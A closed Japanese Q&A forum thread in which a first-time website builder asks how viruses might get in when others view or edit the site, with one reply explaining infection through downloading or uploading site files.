• 締切済み

ホームページの管理とウイルスの進入について

現在、知人に頼まれ初めてのホームページを作成中なのですが ホームページ作成など無縁と思っていたときに聞いた話なので 質問が曖昧になりますがお分かりになる方がありましたらご回答願います。  「自身のホームページの構造などを第三者にチェックしてもらおうと、   第三者の PCで開こうとするときにウイルスが入ってくる。」 これはどのような状況なのでしょう? ホームページ公開後の管理は一台の PCで行わないとウイルス感染しやすいという事でしょうか。 知人の専門家から聞いた話なのですが、アメリカ在住なので確かめられなくて・・・

みんなの回答

• violet430
回答No.1

>ホームページ公開後の管理は一台の PCで行わないとウイルス感染しやすいという事でしょうか。 それは違います。 そのコメントで言いたかったのは、サイトにウイルスが潜んでいる場合、それを編集のためにデータをダウンロードすると、そこでウイルスに感染する恐れがある、と言う意味ではないかと推測します。 あと、これとは逆に、編集者のパソコンがウイルスに感染していた場合、編集後のデータをアップロードするとサイトがウイルスに感染してしまう可能性もありますね。 パソコンだけでなく、サイト側でのウイルス対策が重要になります。

meah1835
質問者

お礼

ご返答があるか待ちましたが やはりこれ以上の回答は見込めそうにありませんね、締め切ります。

meah1835
質問者

補足

>サイトにウイルスが潜んでいる場合 >編集者のパソコンがウイルスに感染していた場合  などについては、質問文の話以前に聞いております、また検索でも多くのものを参照できますが 今回の質問では、ホームページを公開するのは私ではなく友人(企業者)です。 しかしながら、公開後に手直し・追加記載などをする必要があった時、ウイルスの潜入を防ぐ為の心得をご教授願いたいのですが・・・